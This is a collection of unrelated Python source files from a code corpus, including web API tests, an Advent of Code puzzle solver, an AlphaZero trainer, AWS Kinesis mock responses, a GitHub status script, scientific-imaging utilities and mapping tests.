for _ in range(10):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 10
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_next_page(self, client, endpoint, factory):
for _ in range(20):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 10
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is not None
assert 'page%5Bcursor%5D' in resp.json()['links']['next']
resp2 = client.get(resp.json()['links']['next'])
assert resp2.status_code == 200
assert resp2.json()['links']['next'] is None
assert set(x['id'] for x in resp.json()['data']) & set(x['id'] for x in resp2.json()['data']) == set()
def test_bad_cursor(self, client, endpoint, factory):
resp = client.get('/api/v2/creativeworks/', {'page[cursor]': 1})
assert resp.status_code == 404
assert resp.json() == {'errors': [{
'status': '404',
'detail': 'Invalid cursor',
'source': {'pointer': '/data'},
}]}
|
StarcoderdataPython
|
156048
|
from aoc2020 import *
from aoc2020.utils import math_product
from itertools import chain
import numpy as np
def tborder(tile):
_, m = tile
return "".join(m[0])
def bborder(tile):
_, m = tile
return "".join(m[-1])
def lborder(tile):
_, m = tile
return "".join(m[:,0])
def rborder(tile):
_, m = tile
return "".join(m[:,-1])
def orientations(tile):
k, m = tile
for _ in range(2):
for i in range(4):
yield k, m
m = np.rot90(m)
m = np.fliplr(m)
class Solution(SolutionABC):
expected = 20899048083289
def solve(self) -> any:
all_tiles = self.load_tiles()
image_table = self.get_image_table(all_tiles)
return math_product([image_table[y][x][0] for x, y in [(0, 0), (0, -1), (-1, 0), (-1, -1)]])
@classmethod
def get_image_table(cls, tiles):
# Find the top most piece.
search_tile = tiles[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if tborder(t0) == bborder(t):
search_tile = t
break
search_tile = t0
# Find the left most piece.
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if lborder(t0) == rborder(t):
search_tile = t
break
search_tile = t0
assigned = set([search_tile[0]])
# Find all the left most pieces.
img = [[search_tile]]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if bborder(t0) == tborder(t):
search_tile = t
img.append([t])
assigned.add(t[0])
break
# Find the rest of each row
for row in img:
search_tile = row[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if rborder(t0) == lborder(t):
search_tile = t
row.append(t)
assigned.add(t[0])
break
#for r in img:
# print(" ".join([str(c) for c, _ in r]))
return img
def load_tiles(self):
with self.load_resource("input") as src:
return [(k, m) for k, m in self.read_tiles(src)]
def read_tiles(self, src):
while True:
tile_heading = self.read_line(src)
if tile_heading == "":
return
tile_id = int(tile_heading[5:-1])
matrix = list(self.read_until(src, xfrm=lambda s: list(s)))
yield tile_id, np.array(matrix)
|
StarcoderdataPython
|
3367854
|
import time
import numpy as np
from multiprocessing.dummy import Pool as ThreadPool
from mcts import MCTS
from play import play_match
from players.uninformed_mcts_player import UninformedMCTSPlayer
from players.deep_mcts_player import DeepMCTSPlayer
# Object that coordinates AlphaZero training.
class Trainer:
def __init__(self, game, nn, num_simulations, num_games, num_updates, buffer_size_limit, cpuct, num_threads):
self.game = game
self.nn = nn
self.num_simulations = num_simulations
self.num_games = num_games
self.num_updates = num_updates
self.buffer_size_limit = buffer_size_limit
self.training_data = np.zeros((0,3))
self.cpuct = cpuct
self.num_threads = num_threads
self.error_log = []
# Does one game of self play and generates training samples.
def self_play(self, temperature):
s = self.game.get_initial_state()
tree = MCTS(self.game, self.nn)
data = []
scores = self.game.check_game_over(s)
root = True
alpha = 1
weight = .25
while scores is None:
# Think
for _ in range(self.num_simulations):
tree.simulate(s, cpuct=self.cpuct)
# Fetch action distribution and append training example template.
dist = tree.get_distribution(s, temperature=temperature)
# Add dirichlet noise to root
if root:
noise = np.random.dirichlet(np.array(alpha*np.ones_like(dist[:,1].astype(np.float32))))
dist[:,1] = dist[:,1]*(1-weight) + noise*weight
root = False
data.append([s, dist[:,1], None]) # state, prob, outcome
# Sample an action
idx = np.random.choice(len(dist), p=dist[:,1].astype(np.float))
a = tuple(dist[idx, 0])
# Apply action
available = self.game.get_available_actions(s)
template = np.zeros_like(available)
template[a] = 1
s = self.game.take_action(s, template)
# Check scores
scores = self.game.check_game_over(s)
# Update training examples with outcome
for i, _ in enumerate(data):
data[i][-1] = scores
return np.array(data)
# Performs one iteration of policy improvement.
# Creates some number of games, then updates network parameters some number of times from that training data.
def policy_iteration(self, verbose=False):
temperature = 1
if verbose:
print("SIMULATING " + str(self.num_games) + " games")
start = time.time()
if self.num_threads > 1:
jobs = [temperature]*self.num_games
pool = ThreadPool(self.num_threads)
new_data = pool.map(self.self_play, jobs)
pool.close()
pool.join()
self.training_data = np.concatenate([self.training_data] + new_data, axis=0)
else:
for _ in range(self.num_games): # Self-play games
new_data = self.self_play(temperature)
self.training_data = np.concatenate([self.training_data, new_data], axis=0)
if verbose:
print("Simulating took " + str(int(time.time()-start)) + " seconds")
# Prune oldest training samples if a buffer size limit is set.
if self.buffer_size_limit is not None:
self.training_data = self.training_data[-self.buffer_size_limit:,:]
if verbose:
print("TRAINING")
start = time.time()
mean_loss = None
count = 0
for _ in range(self.num_updates):
self.nn.train(self.training_data)
new_loss = self.nn.latest_loss.item()
if mean_loss is None:
mean_loss = new_loss
else:
                mean_loss = (mean_loss*count + new_loss)/(count+1)
count += 1
self.error_log.append(mean_loss)
if verbose:
print("Training took " + str(int(time.time()-start)) + " seconds")
print("Average train error:", mean_loss)
|
StarcoderdataPython
|
83638
|
<reponame>parallelstream/kines<filename>tests/boto3_api_responses.py
import datetime
from dateutil.tz import tzutc, tzlocal
LIST_SHARDS_8_RESPONSE = {
"Shards": [
{
"ShardId": "shardId-000000000007",
"ParentShardId": "shardId-000000000003",
"HashKeyRange": {
"StartingHashKey": "0",
"EndingHashKey": "42535295865117307932921825928971026431",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683191123462322666423956522487359138715784273985650"
},
},
{
"ShardId": "shardId-000000000008",
"ParentShardId": "shardId-000000000003",
"HashKeyRange": {
"StartingHashKey": "42535295865117307932921825928971026432",
"EndingHashKey": "85070591730234615865843651857942052863",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683191145763067864954579664023077411364145779966082"
},
},
{
"ShardId": "shardId-000000000009",
"ParentShardId": "shardId-000000000004",
"HashKeyRange": {
"StartingHashKey": "85070591730234615865843651857942052864",
"EndingHashKey": "127605887595351923798765477786913079295",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683201872421508358184310742703566555228091740848274"
},
},
{
"ShardId": "shardId-000000000010",
"ParentShardId": "shardId-000000000004",
"HashKeyRange": {
"StartingHashKey": "127605887595351923798765477786913079296",
"EndingHashKey": "170141183460469231731687303715884105727",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683201894722253556714933884239284827876453246828706"
},
},
{
"ShardId": "shardId-000000000011",
"ParentShardId": "shardId-000000000005",
"HashKeyRange": {
"StartingHashKey": "170141183460469231731687303715884105728",
"EndingHashKey": "212676479325586539664609129644855132159",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683204057894537814185378613203957274767931643789490"
},
},
{
"ShardId": "shardId-000000000012",
"ParentShardId": "shardId-000000000005",
"HashKeyRange": {
"StartingHashKey": "212676479325586539664609129644855132160",
"EndingHashKey": "255211775190703847597530955573826158591",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683204080195283012716001754739675547416293149769922"
},
},
{
"ShardId": "shardId-000000000013",
"ParentShardId": "shardId-000000000006",
"HashKeyRange": {
"StartingHashKey": "255211775190703847597530955573826158592",
"EndingHashKey": "297747071055821155530452781502797185023",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683205886555644093696476219132855631933918731567314"
},
},
{
"ShardId": "shardId-000000000014",
"ParentShardId": "shardId-000000000006",
"HashKeyRange": {
"StartingHashKey": "297747071055821155530452781502797185024",
"EndingHashKey": "340282366920938463463374607431768211455",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683205908856389292227099360668573904582280237547746"
},
},
]
}
CLOUDWATCH_RESPONSE_H3_P3 = {
"MetricDataResults": [
{
"Id": "ir",
"Label": "IncomingRecords",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
297200.0,
265471.0,
255861.0,
250698.0,
241889.0,
305792.0,
189147.0,
],
"StatusCode": "Complete",
},
{
"Id": "ib",
"Label": "IncomingBytes",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
971488736.0,
877812818.0,
847037776.0,
830774392.0,
798839755.0,
999749339.0,
623121754.0,
],
"StatusCode": "Complete",
},
{
"Id": "grr",
"Label": "GetRecords.Records",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
2079782.0,
1858115.0,
1791687.0,
1754570.0,
1693413.0,
2140395.0,
1323267.0,
],
"StatusCode": "Complete",
},
{
"Id": "wpte",
"Label": "WriteProvisionedThroughputExceeded",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
"StatusCode": "Complete",
},
{
"Id": "rpte",
"Label": "ReadProvisionedThroughputExceeded",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 1.0, 0.0, 3.0, 1.0, 3.0, 5.0],
"StatusCode": "Complete",
},
{
"Id": "giam",
"Label": "GetRecords.IteratorAgeMilliseconds",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 0.0, 0.0, 0.0, 0.0, 36000.0, 0.0],
"StatusCode": "Complete",
},
],
"Messages": [],
}
KINESIS_RECORDS_ITERATOR_1_RESPONSE = {
"Records": [
{
"SequenceNumber": "49600282682944895786267660693075522538255370376250918498",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 41, 761000, tzinfo=tzlocal()
),
"Data": b"<KEY>",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660697997059549906526021357667938",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 45, 180000, tzinfo=tzlocal()
),
"Data": b"<KEY>",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660702176316108314299215755871842",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 48, 83000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICIzIn0K",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660702634498993948243810408466018",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 48, 407000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICI0In0K",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660705672529578639807063884039778",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 50, 666000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICI1In0K",
"PartitionKey": "4439109",
},
],
"NextShardIterator": "AAAA-Shard-Iterator-2",
"MillisBehindLatest": 86346000,
"ResponseMetadata": {
"RequestId": "f66ad0f9-3ade-3f3e-a070-b1f5c9043ac3",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "f66ad0f9-3ade-3f3e-a070-b1f5c9043ac3",
"x-amz-id-2": "y6rEwcgmg3F05eSo8bEqr2OMvkyFQwc8vCjClMZRRfU0fEq2vbR1lD2FC7v0rp43b1LY1acrEaQWjnjOXgBq/DkW39Fbznto",
"date": "Fri, 11 Oct 2019 10:51:56 GMT",
"content-type": "application/x-amz-json-1.1",
"content-length": "91441",
},
"RetryAttempts": 0,
},
}
|
StarcoderdataPython
|
3395023
|
#!/usr/bin/env python3
# Implements https://developer.github.com/v3/repos/statuses/#create-a-status
import argparse
import os
import requests
import sys
def SetCommitStatus(slug, hash, token, params):
url = "https://api.github.com/repos/%s/statuses/%s" % (slug, hash)
headers = {
"Authorization": "token %s" % token
}
r = requests.post(url, headers=headers, json=params)
if r.status_code != 201:
print("Error setting commit status: %s." % r.status_code)
sys.exit(1)
def Main():
token = os.getenv("GITHUB_ACCESS_TOKEN")
url = os.getenv("CIRCLE_BUILD_URL", default="http://mapbox.com")
context = "internal: " + os.getenv("CIRCLE_JOB", default="default")
parser = argparse.ArgumentParser(
description="Sets the status of a commit on GitHUB.")
parser.add_argument("--token", default=token,
help="GitHub token, otherwise environment GITHUB_API_TOKEN. Needs repo:status scope.")
parser.add_argument("--slug", default="mapbox/mapbox-gl-native",
help="Repository slug, example: mapbox/mapbox-gl-native.")
parser.add_argument("--hash", required=True,
help="Commit git hash.")
parser.add_argument("--success", dest="success", action="store_true",
help="The status of the commit, 'failure' if not set.")
parser.add_argument("--pending", dest="pending", action="store_true",
help="The status of the commit, 'failure' if not set.")
parser.add_argument("--url", default=url,
help="URL to associate with this status.")
parser.add_argument("--description",
help="A short description of the status.")
parser.add_argument("--context", default=context,
help="A string label to differentiate this status.")
args = parser.parse_args()
if not args.token:
print("GitHub token not set. Use --token or set GITHUB_ACCESS_TOKEN.")
sys.exit(1)
state = "failure"
description = "Your tests failed on MapboxCI"
if args.success:
state = "success"
description = "Your tests passed on MapboxCI!"
elif args.pending:
state = "pending"
description = "MapboxCI is running your tests"
if args.description:
        description = args.description
params = {
"state": state,
"target_url": args.url,
"description": description,
"context": args.context
}
SetCommitStatus(args.slug, args.hash, args.token, params)
return 0
if __name__ == "__main__":
Main()
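# Hypothetical invocation (script name, SHA and URL below are placeholders):
#   GITHUB_ACCESS_TOKEN=... python set_commit_status.py --hash abc123 --success \
#       --context "internal: build" --url https://example.com/build/42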
|
StarcoderdataPython
|
3299817
|
# proxy module
from traits.util.resource import *
|
StarcoderdataPython
|
4826096
|
import sys
# Django
from django.apps import AppConfig
# from django.core import checks
from django.utils.translation import gettext_lazy as _
class ConfConfig(AppConfig):
name = 'awx.conf'
verbose_name = _('Configuration')
def ready(self):
self.module.autodiscover()
if not set(sys.argv) & {'migrate', 'check_migrations'}:
from .settings import SettingsWrapper
SettingsWrapper.initialize()
|
StarcoderdataPython
|
1739441
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
(C) 2013 by <NAME>
Make sure that you paste some German and English text for
the extraction of language models in text-de-1.txt and
text-en-1.txt. The more text you put in these files,
the better it should be for your model generation.
"""
# https://github.com/dcavar/Py3L
from ngrams import makeNgramModel
# read file
ifp = open("text-de-1.txt", mode='r', encoding='utf8')
mytext = ifp.read()
ifp.close()
mymodel_de = makeNgramModel(mytext, 3)
total = sum(mymodel_de.values())
for key, value in mymodel_de.items():
mymodel_de[key] = value / total
# print(key, mymodel_de[key])
# read file
ifp = open("text-en-1.txt", mode='r', encoding='utf8')
mytext = ifp.read()
ifp.close()
mymodel_en = makeNgramModel(mytext, 3)
total = sum(mymodel_en.values())
for key, value in mymodel_en.items():
mymodel_en[key] = value / total
# print(key, mymodel_en[key])
mytext = "Dies ist ein kleiner Test."
mymodel_unk = makeNgramModel(mytext, 3)
total = sum(mymodel_unk.values())
en_dist = 0.0
de_dist = 0.0
for key, value in mymodel_unk.items():
mymodel_unk[key] = value / total
en_dist += abs(mymodel_en.get(key, 1) - mymodel_unk[key])
de_dist += abs(mymodel_de.get(key, 1) - mymodel_unk[key])
print(mytext)
print(en_dist, de_dist)
if en_dist < de_dist:
print("This text is English!")
else:
print("This text is German!")
|
StarcoderdataPython
|
56284
|
<gh_stars>0
#!/usr/bin/env python3
"""
Tools to truncate functional images to remove all data recorded before the first stimulus.
To use, call main().
Created on 7/6/2021 by <NAME>.
"""
# Standard Python modules.
from os import PathLike
import subprocess
def main(onsets_path: PathLike, func_path: PathLike, out_prefix: PathLike) -> None:
"""
Truncate our images!
"""
new_start_volume = _get_volume(_get_start_time(onsets_path))
truncate_volumes(func_path, new_start_volume, out_prefix)
def main2(new_start_volume: int, func_path: PathLike, out_prefix: PathLike) -> None:
"""
Truncate our images! But this time, using a start volume rather than adjusting the image to some onsets.
"""
truncate_volumes(func_path, new_start_volume, out_prefix)
def _get_start_time(onsets_path: PathLike) -> float:
"""
Returns the first onset time.
"""
with open(onsets_path, "r") as f:
onsets = f.readlines()
return float(onsets[0])
def _get_volume(time_in_seconds: float) -> int:
"""
    Returns the volume containing the indicated time point, assuming a repetition time (TR) of 2 seconds.
"""
return int((time_in_seconds - time_in_seconds % 2) / 2)
def truncate_volumes(func_path: PathLike, new_start_volume: int, out_prefix: PathLike):
"""
Removes volumes from the beginning of a 4D image. Returns the path to the .HEAD outfile.
"""
command = [
"3dTcat",
f"{func_path}[{new_start_volume}..$]",
"-prefix", out_prefix,
]
subprocess.run(command)
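# Hypothetical usage (paths, prefix and start volume below are made up):
#   main("onsets.txt", "func.nii.gz", "func_truncated")   # align to the first onset
#   main2(4, "func.nii.gz", "func_truncated")             # drop the first 4 volumes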
|
StarcoderdataPython
|
3224749
|
import os
import sys
import tkinter
import gobject
from gi.repository import gst
def on_sync_message(bus, message, window_id):
if not message.structure is None:
if message.structure.get_name() == 'prepare-xwindow-id':
image_sink = message.src
image_sink.set_property('force-aspect-ratio', True)
image_sink.set_xwindow_id(window_id)
gobject.threads_init()
window = tkinter.Tk()
window.geometry('500x400')
video = tkinter.Frame(window, bg='#000000')
video.pack(side=tkinter.BOTTOM,anchor=tkinter.S,expand=tkinter.YES,fill=tkinter.BOTH)
window_id = video.winfo_id()
player = gst.element_factory_make('playbin2', 'player')
player.set_property('video-sink', None)
player.set_property('uri', 'file://%s' % (os.path.abspath(sys.argv[1])))
player.set_state(gst.STATE_PLAYING)
bus = player.get_bus()
bus.add_signal_watch()
bus.enable_sync_message_emission()
bus.connect('sync-message::element', on_sync_message, window_id)
window.mainloop()
|
StarcoderdataPython
|
3364473
|
""" The different objects which can be declared. """
# pylint: disable=R0903
from .types import CType
class CDeclaration:
""" A single declaration """
def __init__(self, storage_class, typ: CType, name, location):
assert isinstance(typ, CType)
assert isinstance(name, str) or name is None
self.name = name
self.location = location
self.typ = typ
self.storage_class = storage_class
@property
def is_function(self):
return isinstance(self, FunctionDeclaration)
class Typedef(CDeclaration):
""" Type definition """
def __init__(self, typ, name, location):
super().__init__('typedef', typ, name, location)
def __repr__(self):
return 'Typedef {}'.format(self.name)
class VariableDeclaration(CDeclaration):
""" Variable declaration, be it local or global """
def __init__(self, storage_class, typ, name, initial_value, location):
super().__init__(storage_class, typ, name, location)
self.initial_value = initial_value
def __repr__(self):
return 'Variable [storage={} typ={} name={}]'.format(
self.storage_class, self.typ, self.name)
class ConstantDeclaration(CDeclaration):
def __init__(self, storage_class, typ, name, value, location):
super().__init__(storage_class, typ, name, location)
self.value = value
def __repr__(self):
return 'Constant [typ={} name={}, {}]'.format(
self.typ, self.name, self.value)
class EnumDeclaration(CDeclaration):
    """ Enum declaration """
    def __init__(self, typ, name, constants, location):
        super().__init__(None, typ, name, location)
        self.constants = constants
class EnumConstantDeclaration(CDeclaration):
""" Declaration of an enum value """
def __init__(self, typ, name, value, location):
super().__init__(None, typ, name, location)
self.value = value
def __repr__(self):
return 'Value [typ={} name={}, {}]'.format(
self.typ, self.name, self.value)
class ParameterDeclaration(CDeclaration):
""" Function parameter declaration """
def __repr__(self):
return 'Parameter [typ={} name={}]'.format(
self.typ, self.name)
class FunctionDeclaration(CDeclaration):
""" A function declaration """
def __init__(self, storage_class, typ, name, location):
super().__init__(storage_class, typ, name, location)
self.body = None
def __repr__(self):
return 'Function storage={} typ={} name={}'.format(
self.storage_class, self.typ, self.name)
|
StarcoderdataPython
|
3297167
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy import units as u
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from gammapy.irf import EnergyDependentMultiGaussPSF
from gammapy.utils.testing import mpl_plot_check, requires_data, requires_dependency
@requires_data()
class TestEnergyDependentMultiGaussPSF:
@pytest.fixture(scope="session")
def psf(self):
filename = "$GAMMAPY_DATA/tests/unbundled/irfs/psf.fits"
return EnergyDependentMultiGaussPSF.read(filename, hdu="POINT SPREAD FUNCTION")
def test_info(self, psf):
info_str = open(get_pkg_data_filename("data/psf_info.txt")).read()
assert psf.info() == info_str
def test_write(self, tmp_path, psf):
psf.write(tmp_path / "tmp.fits")
with fits.open(tmp_path / "tmp.fits", memmap=False) as hdu_list:
assert len(hdu_list) == 2
def test_to_table_psf(self, psf):
energy = 1 * u.TeV
theta = 0 * u.deg
rad = np.linspace(0, 2, 300) * u.deg
table_psf = psf.to_energy_dependent_table_psf(theta, rad=rad)
psf_at_energy = psf.psf_at_energy_and_theta(energy, theta)
containment = [0.68, 0.8, 0.9]
desired = [psf_at_energy.containment_radius(_) for _ in containment]
table_psf_at_energy = table_psf.table_psf_at_energy(energy)
actual = table_psf_at_energy.containment_radius(containment)
assert_allclose(desired, actual.degree, rtol=1e-2)
def test_to_psf3d(self, psf):
rads = np.linspace(0.0, 1.0, 101) * u.deg
psf_3d = psf.to_psf3d(rads)
assert psf_3d.rad_axis.nbin == 100
assert psf_3d.rad_axis.unit == "deg"
theta = 0.5 * u.deg
energy = 0.5 * u.TeV
containment = [0.68, 0.8, 0.9]
desired = np.array(
[psf.containment_radius(energy, theta, _).value for _ in containment]
)
actual = np.array(
[psf_3d.containment_radius(energy, theta, _).value for _ in containment]
)
assert_allclose(np.squeeze(desired), actual, atol=0.005)
@requires_dependency("matplotlib")
def test_peek(self, psf):
with mpl_plot_check():
psf.peek()
@requires_data()
def test_psf_cta_1dc():
filename = (
"$GAMMAPY_DATA/cta-1dc/caldb/data/cta/1dc/bcf/South_z20_50h/irf_file.fits"
)
psf_irf = EnergyDependentMultiGaussPSF.read(filename, hdu="POINT SPREAD FUNCTION")
# Check that PSF is filled with 0 for energy / offset where no PSF info is given.
# This is needed so that stacked PSF computation doesn't error out,
# trying to interpolate for observations / energies where this occurs.
psf = psf_irf.to_energy_dependent_table_psf("4.5 deg")
psf = psf.table_psf_at_energy("0.05 TeV")
assert_allclose(psf.evaluate(rad="0.03 deg").value, 0)
# Check that evaluation works for an energy / offset where an energy is available
psf = psf_irf.to_energy_dependent_table_psf("2 deg")
psf = psf.table_psf_at_energy("1 TeV")
assert_allclose(psf.containment_radius(0.68).deg, 0.052841, atol=1e-4)
|
StarcoderdataPython
|
1708137
|
<reponame>rupakc/NeuralSearchSpace<gh_stars>1-10
LOCAL_MONGO_HOSTNAME = 'localhost'
LOCAL_MONGO_PORT = 27017
EXPIRE_TIME = 1000
DB_NAME = 'Optimization'
COLLECTION_NAME = 'NeuralSearchSpace'
|
StarcoderdataPython
|
3202242
|
from __future__ import annotations
from dnnv.properties.expressions.base import Expression
from ...expressions import BinaryExpression, Call
from ..base import GenericExpressionTransformer
from ._calls import FunctionSubstitutor
from ...visitors import DetailsInference
class SubstituteCalls(GenericExpressionTransformer):
def __init__(self, form="dnf"):
super().__init__()
# `form` provides a hint to the substitutor on how to efficiently
# format the substitution expression
self.form = form
def visit(self, expression):
if self._top_level:
DetailsInference().visit(expression)
return super().visit(expression)
def visit_BinaryExpression(self, expression: BinaryExpression) -> BinaryExpression:
expr_type = type(expression)
expr1 = expression.expr1
expr2 = expression.expr2
if isinstance(expr1, Call) and expr1.function.is_concrete:
substitutor = FunctionSubstitutor.lookup(expr1.function.value)
binexpr_substitute_method = f"substitute_{expr_type.__name__}"
if substitutor is not None and hasattr(
substitutor, binexpr_substitute_method
):
result = getattr(substitutor, binexpr_substitute_method)(
expr1, expr2, form=self.form
)
if result is not NotImplemented:
return self.visit(result)
elif isinstance(expr2, Call) and expr2.function.is_concrete:
substitutor = FunctionSubstitutor.lookup(expr2.function.value)
binexpr_substitute_method = f"substitute_{expr_type.__name__}"
if substitutor is not None and hasattr(
substitutor, binexpr_substitute_method
):
result = getattr(substitutor, binexpr_substitute_method)(
expr1, expr2, form=self.form
)
if result is not NotImplemented:
return self.visit(result)
return expr_type(self.visit(expr1), self.visit(expr2))
def visit_Call(self, expression: Call) -> Expression:
function = self.visit(expression.function)
args = tuple([self.visit(arg) for arg in expression.args])
kwargs = {name: self.visit(value) for name, value in expression.kwargs.items()}
if function.is_concrete:
substitutor = FunctionSubstitutor.lookup(function.value)
if substitutor is not None:
result = substitutor(function, *args, **kwargs)
if result is not NotImplemented:
return result
expr = Call(function, args, kwargs)
return expr
def visit_Not(self, expression):
form = self.form
self.form = "cnf" if form == "dnf" else "dnf"
result = super().generic_visit(expression)
self.form = form
return result
__all__ = ["SubstituteCalls"]
|
StarcoderdataPython
|
3365822
|
<reponame>lucky-luk3/msticpy
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import math
import os
import unittest
from pathlib import Path
import folium
import nbformat
import pandas as pd
import pytest
from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
from msticpy.datamodel.entities import GeoLocation, Host, IpAddress
from msticpy.nbtools.foliummap import (
FoliumMap,
get_center_geo_locs,
get_center_ip_entities,
get_map_center,
)
from ..unit_test_lib import TEST_DATA_PATH
_NB_FOLDER = "docs/notebooks"
_NB_NAME = "FoliumMap.ipynb"
class TestFoliumMap(unittest.TestCase):
"""Unit test class."""
def test_folium_map(self):
# Read in some data
ip_locs_file = Path(TEST_DATA_PATH).joinpath("ip_locs.csv")
geo_loc_df = pd.read_csv(ip_locs_file, index_col=0)
# Create IP and GeoLocation Entities from the dataframe
geo_locs = list(geo_loc_df.apply(create_geo_entity, axis=1).values)
ip_entities = list(geo_loc_df.apply(create_ip_entity, axis=1).values)
folium_map = FoliumMap(
width="50%", height="50%", location=(47.5982328, -122.331), zoom_start=14
)
self.assertIsInstance(folium_map.folium_map, folium.Map)
for ip in ip_entities:
ip.AdditionalData.update({"name": "test", "role": "testrole"})
folium_map = FoliumMap(zoom_start=9)
folium_map.add_ip_cluster(ip_entities=ip_entities, color="orange")
ip_entities_clean = [
ip
for ip in ip_entities
if ip.Location
and ip.Location.Latitude
and not math.isnan(ip.Location.Latitude)
and not math.isnan(ip.Location.Longitude)
]
self.assertEqual(len(ip_entities_clean), len(folium_map.locations))
folium_map.add_ip_cluster(ip_entities=ip_entities_clean)
folium_map.center_map()
folium_map.add_geoloc_cluster(geo_locations=geo_locs, color="orange")
self.assertEqual(len(ip_entities_clean) * 3, len(folium_map.locations))
geo_tuples = geo_loc_df.apply(
lambda x: (x.Latitude, x.Longitude), axis=1
).values
folium_map.add_locations(locations=geo_tuples, color="orange")
self.assertEqual(len(ip_entities_clean) * 4, len(folium_map.locations))
# test centering algorithms
center = get_center_geo_locs(geo_locs)
